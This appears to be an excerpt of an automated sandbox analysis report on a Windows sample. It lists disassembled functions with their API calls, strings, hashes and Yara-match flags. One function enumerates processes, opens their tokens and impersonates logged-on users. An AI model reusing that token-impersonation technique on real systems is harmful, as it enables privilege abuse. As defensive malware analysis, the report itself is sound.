Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6CFA5003F,?,?,00000000,00007FF6CFA502DA,?,?,?,?,?,00007FF6CFA50266), ref: 00007FF6CFA50C5B
FlsSetValue.KERNEL32(?,?,?,00007FF6CFA5003F,?,?,00000000,00007FF6CFA502DA,?,?,?,?,?,00007FF6CFA50266), ref: 00007FF6CFA50C7A
FlsSetValue.KERNEL32(?,?,?,00007FF6CFA5003F,?,?,00000000,00007FF6CFA502DA,?,?,?,?,?,00007FF6CFA50266), ref: 00007FF6CFA50CA2
FlsSetValue.KERNEL32(?,?,?,00007FF6CFA5003F,?,?,00000000,00007FF6CFA502DA,?,?,?,?,?,00007FF6CFA50266), ref: 00007FF6CFA50CB3
FlsSetValue.KERNEL32(?,?,?,00007FF6CFA5003F,?,?,00000000,00007FF6CFA502DA,?,?,?,?,?,00007FF6CFA50266), ref: 00007FF6CFA50CC4

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a81210357f2d12b0dbfe06c4392c56b8a615d5a3cfef92a64af55cf6380a756d
Instruction ID: 2d905501c473b026efdbaeafada38abf6bf4581a21d6cdf232055377796c8e6e
Opcode Fuzzy Hash: a81210357f2d12b0dbfe06c4392c56b8a615d5a3cfef92a64af55cf6380a756d
Instruction Fuzzy Hash: 09117F50F0CA43C1FA595FB6699113AB3956F453B2F148738E9BEC77C6DE2CE4418620

Function 000002093357843C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000002093356F8AF,?,?,00000000,000002093356FB4A,?,?,?,?,-2891666E48DAA7FF,000002093356FAD6), ref: 000002093357845B
FlsSetValue.KERNEL32(?,?,?,000002093356F8AF,?,?,00000000,000002093356FB4A,?,?,?,?,-2891666E48DAA7FF,000002093356FAD6), ref: 000002093357847A
FlsSetValue.KERNEL32(?,?,?,000002093356F8AF,?,?,00000000,000002093356FB4A,?,?,?,?,-2891666E48DAA7FF,000002093356FAD6), ref: 00000209335784A2
FlsSetValue.KERNEL32(?,?,?,000002093356F8AF,?,?,00000000,000002093356FB4A,?,?,?,?,-2891666E48DAA7FF,000002093356FAD6), ref: 00000209335784B3
FlsSetValue.KERNEL32(?,?,?,000002093356F8AF,?,?,00000000,000002093356FB4A,?,?,?,?,-2891666E48DAA7FF,000002093356FAD6), ref: 00000209335784C4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4ce4a5051ebace67528a179680f56dd4679384bab99bc7618957d122f6916756
Instruction ID: 38c75e6a66ac161c89a626d2255fe43a078cb65498a2f1bb43f369237fe2049f
Opcode Fuzzy Hash: 4ce4a5051ebace67528a179680f56dd4679384bab99bc7618957d122f6916756
Instruction Fuzzy Hash: 50115B2038474041FA68A726AADF76961426BC53F8F08D7E5B93F467DBEE68D4C18B00

Function 00007FF6CFA402F0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA407B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA407BC
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA407C9

Strings

integral cannot be stored in char, xrefs: 00007FF6CFA407C2

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: integral cannot be stored in char
API String ID: 4097890229-960316848
Opcode ID: d3fa661c7909c31f2df10136174ae6b23e08351e8602a3bf3b77da77346b9ec4
Instruction ID: 6e7dcb199c6c5ab101927fe4888c13d6c2c08aaa85728ffa1fa414c7ebd5dd81
Opcode Fuzzy Hash: d3fa661c7909c31f2df10136174ae6b23e08351e8602a3bf3b77da77346b9ec4
Instruction Fuzzy Hash: A8E1DE22E18B91C9EB10CFA9E4403ECBBB1BB85349F509135DEDD97A99DF38A481D710

Function 00007FF6CFA415D0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 333COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA41A76
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA41A7C
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA41A89

Strings

integral cannot be stored in char, xrefs: 00007FF6CFA41A82

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: integral cannot be stored in char
API String ID: 4097890229-960316848
Opcode ID: 73f37ea3a65df646b8d9a74c0d95f76a994af0d7590115819a880ecab22728cb
Instruction ID: 011c317a4efbbad2f1677e385b5d9edcfe13aaa8abb910d410451fb75c054cd6
Opcode Fuzzy Hash: 73f37ea3a65df646b8d9a74c0d95f76a994af0d7590115819a880ecab22728cb
Instruction Fuzzy Hash: 65E1CB22E08B81C9EB11CFA8D4403ECBBB1BB45349F545236DA9D97A9ADF38E485D710

Function 00007FF6CFA3FC80 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CFA400E9

Strings

integral cannot be stored in char, xrefs: 00007FF6CFA400E2

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: integral cannot be stored in char
API String ID: 909987262-960316848
Opcode ID: 798eccc9fbd753bed3f49468c2a2aa55f5ebd2e469281c1ab0b60e4ad41c59eb
Instruction ID: 11f591e834665b4fdce1e7f5b2329a1a02a772d8cd207a4f31c4d72378f2d772
Opcode Fuzzy Hash: 798eccc9fbd753bed3f49468c2a2aa55f5ebd2e469281c1ab0b60e4ad41c59eb
Instruction Fuzzy Hash: DDD1DF22E18B81C9EB14CFA5E4443BCB7B1BB89349F504136DE9D97A99DF38E489C350

Function 0000020933526510 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000020933526580
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00000209335265C8
_Getcoll.LIBCPMT ref: 00000209335265FC

Strings

bad locale name, xrefs: 0000020933526701

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$GetcollLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1287851536-1405518554
Opcode ID: 74862df7fbbafa21fa25c72662e696390ea44108fdc2782757ad4660e8e23af9
Instruction ID: 3ebfe0b916aa99ec62f4c8dbf84722e58d1599000e82c03b62246218a4fe7ff5
Opcode Fuzzy Hash: 74862df7fbbafa21fa25c72662e696390ea44108fdc2782757ad4660e8e23af9
Instruction Fuzzy Hash: 16919332742B408AFB14DFB5E49439C7362EB84788F448165EE4E5BB9BDE78C4918B80

Function 000002093359D3EC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093359D6CB

Part of subcall function 000002093358A7BC: _invalid_parameter_noinfo.LIBCMT ref: 000002093358A7D9

Strings

UTF-8, xrefs: 000002093359D64A
UTF-16LEUNICODE, xrefs: 000002093359D669
ccs, xrefs: 000002093359D606

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: c93d0c80d14289c47e4e012ab7823fd63e1d2ef69c6c82be7162492af36b69b4
Instruction ID: 79ac8b6a20e449153800b9b552693ec40d9ac53093a25bc2407c7f7c29e912c5
Opcode Fuzzy Hash: c93d0c80d14289c47e4e012ab7823fd63e1d2ef69c6c82be7162492af36b69b4
Instruction Fuzzy Hash: 98818E72684300C5FB659F29C2D837966E2E392B4CF95C085FA0F97297D329D9C19F41

Function 00007FF6CFA3E410 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA3E63F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA3E645

Strings

true, xrefs: 00007FF6CFA3E5D8
false, xrefs: 00007FF6CFA3E5DF

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: false$true
API String ID: 3668304517-2658103896
Opcode ID: c23aa86301010fbc63903a689a8f217cc4f8b4650af5b1d90549298ac87a62d0
Instruction ID: 49c806fd6165628967d479e6acd52af8386600758b3667935d93507a9fcb058d
Opcode Fuzzy Hash: c23aa86301010fbc63903a689a8f217cc4f8b4650af5b1d90549298ac87a62d0
Instruction Fuzzy Hash: 9E61A062F09B8188FB018FE9D4513FDA3A1AB447A9F004235DE9D677E9DE38D44EC210

Function 0000020933539E10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 0000020933539FF0
__std_exception_destroy.LIBVCRUNTIME ref: 0000020933539FFD

Strings

, column , xrefs: 0000020933539EC8
at line , xrefs: 0000020933539E9A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy
String ID: at line $, column
API String ID: 2453523683-191570568
Opcode ID: 5ce9a49de8b66b01148a6eef5a832e2760853f85d6b2e7acd99199e61b9caa52
Instruction ID: 086d6e0c7437a8fd3379a8e8f8362237e57e767e99b2edb74cb9e708d8ee397b
Opcode Fuzzy Hash: 5ce9a49de8b66b01148a6eef5a832e2760853f85d6b2e7acd99199e61b9caa52
Instruction Fuzzy Hash: 67518162644B8081EA109F1AE5C839EA761F7C5BE0F508651FBAE47B9BDF38C4D1CB40

Function 000002093350C910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000002093350C97F
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000002093350C9C7
_Getctype.LIBCPMT ref: 000002093350CA05

Strings

bad locale name, xrefs: 000002093350CABE

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$GetctypeLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1612978173-1405518554
Opcode ID: 46d9d351cbae950c97d3efdf3bb968080939ec0806b1b426b78fbc529c5de539
Instruction ID: ac78d12a20d1e79184471004187caa76bbac0888b166667c48a075fba24d321c
Opcode Fuzzy Hash: 46d9d351cbae950c97d3efdf3bb968080939ec0806b1b426b78fbc529c5de539
Instruction Fuzzy Hash: 3F516A32782B409AFB10CF60D4943EC7375EB85748F048565EE8E2AA97DB34C595D744

Function 0000020933560F00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000020933560F8B

Strings

?, xrefs: 0000020933560F40

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Open
String ID: ?
API String ID: 71445658-1684325040
Opcode ID: ae20c4400d9e9c2c0969bfe36e7cbfe1bd5a1aa7e47ec86efd43c74b2a0ce599
Instruction ID: 0e9bfc1be035b639bc967df3b1eb5c3a2cec4585ebbe563ddca72995fb1f5e78
Opcode Fuzzy Hash: ae20c4400d9e9c2c0969bfe36e7cbfe1bd5a1aa7e47ec86efd43c74b2a0ce599
Instruction Fuzzy Hash: D141AF72658B8482EB50CB25F48836AB7A0F7C9794F109215FA9E46A9BDF3CC1D4CF40

Function 0000020933599520 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000020933599536
GetProcAddress.KERNEL32 ref: 0000020933599546

Strings

kernel32.dll, xrefs: 000002093359952F
GetTempPath2W, xrefs: 000002093359953C

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetTempPath2W$kernel32.dll
API String ID: 1646373207-1846531799
Opcode ID: 54cfff917e61736e637f3daaf4ede8ca0052c6a8694a4254edfc7bf5cdf1c370
Instruction ID: 1aa8d7af619e3905eb9a9b9dec2b17db5e8d34d811d8fb5f92eac03d97fa0f1f
Opcode Fuzzy Hash: 54cfff917e61736e637f3daaf4ede8ca0052c6a8694a4254edfc7bf5cdf1c370
Instruction Fuzzy Hash: CAE0E561350B4482EE089B11F9CC26933A1FBC8B85F5890A5E91F47337DE3CC4C58B50

Function 000002093354F480 Relevance: 6.5, APIs: 4, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 000002093354ED30: CreateToolhelp32Snapshot.KERNEL32 ref: 000002093354ED86
Part of subcall function 000002093354ED30: Process32FirstW.KERNEL32 ref: 000002093354EDCA
Part of subcall function 000002093354ED30: Process32NextW.KERNEL32 ref: 000002093354EDDF
Part of subcall function 000002093354ED30: OpenProcess.KERNEL32 ref: 000002093354EE1B
Part of subcall function 000002093354ED30: OpenProcessToken.ADVAPI32 ref: 000002093354EE42
Part of subcall function 000002093354ED30: CloseHandle.KERNEL32 ref: 000002093354EFB6
Part of subcall function 000002093354ED30: Process32NextW.KERNEL32 ref: 000002093354EFC3
Part of subcall function 000002093354ED30: CloseHandle.KERNEL32 ref: 000002093354F007

ImpersonateLoggedOnUser.ADVAPI32 ref: 000002093354F4DD
ImpersonateLoggedOnUser.ADVAPI32 ref: 000002093354F9C8
RevertToSelf.ADVAPI32 ref: 000002093354F9E6

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleImpersonateLoggedNextOpenProcessUser$CreateFirstRevertSelfSnapshotTokenToolhelp32
String ID:
API String ID: 1562318730-0
Opcode ID: 06a24896d21961bda544a85950961da782cb6d8cb74c4ce846b14c2e186c7f92
Instruction ID: 1ee9962a29777b6162f3265dee4beacd7b75ee3d71141d7208ae1427a78b322f
Opcode Fuzzy Hash: 06a24896d21961bda544a85950961da782cb6d8cb74c4ce846b14c2e186c7f92
Instruction Fuzzy Hash: 7522A162B5878486FB04DB79D4983AE2761E7C17A4F509741FA6E46AEBDF78C4C0CB00

Function 000002093357A888 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002093357A907
WriteFile.KERNEL32 ref: 000002093357ABCF
WriteFile.KERNEL32 ref: 000002093357AC15
GetLastError.KERNEL32 ref: 000002093357ACCB

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 523722e26ffa46449d979bd975143a43a29be3ae997596a7a20ff96f8c1017ee
Instruction ID: 5d0466c77ae6a5e399522537c78ad0c1917a3f5da476dee68376bc67090edd94
Opcode Fuzzy Hash: 523722e26ffa46449d979bd975143a43a29be3ae997596a7a20ff96f8c1017ee
Instruction Fuzzy Hash: 63D12332B54B809AE711CFB9D48839C37B5F384798F048256EE5E97B9BDA35C486CB40

Function 000002093357B248 Relevance: 6.2, APIs: 4, Instructions: 218COMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000002093357B364
GetLastError.KERNEL32 ref: 000002093357B3EF

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 051a95757f3cd31bcbf302130b81a7499006cb3b8c40f8426fd2f443c90a72fc
Instruction ID: 2b5ad1db72a8924c33ea6542a1a3be5827ce6d140052fa4fb6e8f8e766060d20
Opcode Fuzzy Hash: 051a95757f3cd31bcbf302130b81a7499006cb3b8c40f8426fd2f443c90a72fc
Instruction Fuzzy Hash: 9791A06275075089FB64DF6994C87AD3BA1B784B88F548189FE0F67A97DA34C8C2CB10

Function 00007FF6CFA39B40 Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA39C80
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA39C86
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA39CE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA39D7C

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: ccfe53ba09f4fe5ed3b1926650209fc6c0cace94c63fa37a7c28710fcedfeb16
Instruction ID: e1ea1ff3165d89c07853e8b1d49575970010ba58a6b5f02abc656e08461cf113
Opcode Fuzzy Hash: ccfe53ba09f4fe5ed3b1926650209fc6c0cace94c63fa37a7c28710fcedfeb16
Instruction Fuzzy Hash: 2551E262B09B85C5EE149FA6E0043BDE3A2EB08BD6F584531DA9D8B789DF3CD4858314

Function 0000020933564220 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0000020933564240
FreeEnvironmentStringsW.KERNEL32 ref: 000002093356433B
RtlInitUnicodeString.NTDLL ref: 00000209335643AE
RtlInitUnicodeString.NTDLL ref: 00000209335643BB

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: EnvironmentInitStringStringsUnicode$Free
String ID:
API String ID: 2488768755-0
Opcode ID: 33d58a5581a8a534ea9e3a1eb6fb451536a7101ad13a3bcd3780c6a196434757
Instruction ID: 03dbf2b51b87f486092d0e48e58d0a639157779dc9e2f46f393e562a9c5b9a58
Opcode Fuzzy Hash: 33d58a5581a8a534ea9e3a1eb6fb451536a7101ad13a3bcd3780c6a196434757
Instruction Fuzzy Hash: A7518B72A18B8482EB108F19E48435D77A0F7D8B98F54E251EB9E03B96DF78D1E1CB40

Function 0000020933520120 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 000002093359A8FC: std::_Lockit::_Lockit.LIBCPMT ref: 000002093359A919
Part of subcall function 000002093359A8FC: std::locale::_Setgloballocale.LIBCPMT ref: 000002093359A93C

std::_Lockit::_Lockit.LIBCPMT ref: 0000020933520161
std::_Lockit::_Lockit.LIBCPMT ref: 0000020933520186
std::_Facet_Register.LIBCPMT ref: 0000020933520232
Concurrency::cancel_current_task.LIBCPMT ref: 0000020933520294

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
String ID:
API String ID: 3698853521-0
Opcode ID: 7fc3597cd9704a6304594a27bb2dfeeca3e59ce2e728f14c12add50f8541c22a
Instruction ID: c6144cbd50430756b2dcb1a2731c42eac61be98d895e50dac1430a812cad53f1
Opcode Fuzzy Hash: 7fc3597cd9704a6304594a27bb2dfeeca3e59ce2e728f14c12add50f8541c22a
Instruction Fuzzy Hash: 2A417F32295B4096EA11DB12E8C935973A5F7C8B94F5486A2FA9E43797DF3CC4C2CB10

Function 0000020933570274 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000209335702ED
_invalid_parameter_noinfo.LIBCMT ref: 0000020933570349
_invalid_parameter_noinfo.LIBCMT ref: 0000020933570384
_invalid_parameter_noinfo.LIBCMT ref: 00000209335703A9

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f47f5365830de18e31c9f66efcfcebced3ed900e80df05c2fe820f8996efde49
Instruction ID: 5778f5d756da17ee9b0240434a755691fa27cd6af787eca8f6a401e830501ec0
Opcode Fuzzy Hash: f47f5365830de18e31c9f66efcfcebced3ed900e80df05c2fe820f8996efde49
Instruction Fuzzy Hash: 81413B63144B84CAE7529F21C4983AC3BE0E785F84F09D181EA8E4B397DA3DC485CB16

Function 00007FF6CFA32810 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6CFA3283B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6CFA32860
std::_Facet_Register.LIBCPMT ref: 00007FF6CFA3290B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA32956

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: 3a769e8cb690939059ebf57778ce7d24e14301819ffc5f3cd8bedc43d4ee7ce3
Instruction ID: 55a3118e7afd72f8c4803bc07ba5c1b4609926640d7d66e094f5cae5c1946260
Opcode Fuzzy Hash: 3a769e8cb690939059ebf57778ce7d24e14301819ffc5f3cd8bedc43d4ee7ce3
Instruction Fuzzy Hash: 9A416226A08B42C2FA159F55F8442BAB7A0FB48B95F580531EACD877A9DF3CE445C720

Function 00000209335339F0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000020933533A1B
std::_Lockit::_Lockit.LIBCPMT ref: 0000020933533A40
std::_Facet_Register.LIBCPMT ref: 0000020933533AEB
